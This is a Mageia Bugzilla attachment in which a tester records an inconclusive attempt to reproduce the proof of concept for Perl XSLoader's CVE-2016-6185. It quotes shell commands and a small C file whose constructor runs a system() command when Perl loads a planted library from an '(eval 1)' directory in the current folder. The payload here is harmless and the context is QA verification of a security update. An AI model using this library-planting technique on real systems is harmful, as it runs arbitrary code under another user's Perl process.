Mageia Bugzilla – Attachment 8339 Details for
Bug 18894
perl, perl-XSLoader new security issue CVE-2016-6185
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Inconclusive attempt to exercise a PoC
report.poc (text/plain), 1.19 KB, created by
Len Lawrence
on 2016-08-12 20:08:20 CEST
(
hide
)
Description:
Inconclusive attempt to exercise a PoC
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2016-08-12 20:08:20 CEST
Size:
1.19 KB
patch
obsolete
>PoC at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578 > >$ mkdir -p '(eval 1)/auto/List/MoreUtils/' >$ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so' >$ perl -e 'no lib "."; use List::MoreUtils' > (__) > (oo) > /------\/ > / | || > * /\---/\ > ~~ ~~ >..."Have you mooed today?"... >Segmentation fault > >$ locate auto/List/MoreUtils/MoreUtils.so >/usr/lib/perl5/vendor_perl/5.20.1/x86_64-linux-thread-multi/auto/List/MoreUtils/MoreUtils.so > >moo.c contains: >#include <signal.h> >#include <stdlib.h> >void __attribute__((constructor)) moo() { > system("apt-get moo"); > kill(0, SIGSEGV); >} > >moo seems to be specific to Debian so I replaced the system command with something arbitrary (magaeiawelcome in fact). > >Ran the three commands above, both before and after the update using modified moo.c. >Directory (eval 1)/auto/List/MoreUtils was created in the cwd and contained the compiled object (executable). > >$ file MoreUtils.so >MoreUtils.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=559815b135830038c967dd0a2b486d325b9f0940, not stripped > >$ ./MoreUtils.so >Segmentation fault > >
PoC at https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=829578 $ mkdir -p '(eval 1)/auto/List/MoreUtils/' $ gcc -Wall -fPIC -shared moo.c -o '(eval 1)/auto/List/MoreUtils/MoreUtils.so' $ perl -e 'no lib "."; use List::MoreUtils' (__) (oo) /------\/ / | || * /\---/\ ~~ ~~ ..."Have you mooed today?"... Segmentation fault $ locate auto/List/MoreUtils/MoreUtils.so /usr/lib/perl5/vendor_perl/5.20.1/x86_64-linux-thread-multi/auto/List/MoreUtils/MoreUtils.so moo.c contains: #include <signal.h> #include <stdlib.h> void __attribute__((constructor)) moo() { system("apt-get moo"); kill(0, SIGSEGV); } moo seems to be specific to Debian so I replaced the system command with something arbitrary (magaeiawelcome in fact). Ran the three commands above, both before and after the update using modified moo.c. Directory (eval 1)/auto/List/MoreUtils was created in the cwd and contained the compiled object (executable). $ file MoreUtils.so MoreUtils.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=559815b135830038c967dd0a2b486d325b9f0940, not stripped $ ./MoreUtils.so Segmentation fault
View Attachment As Raw
Actions:
View
Attachments on
bug 18894
:
8339
|
8340
|
8341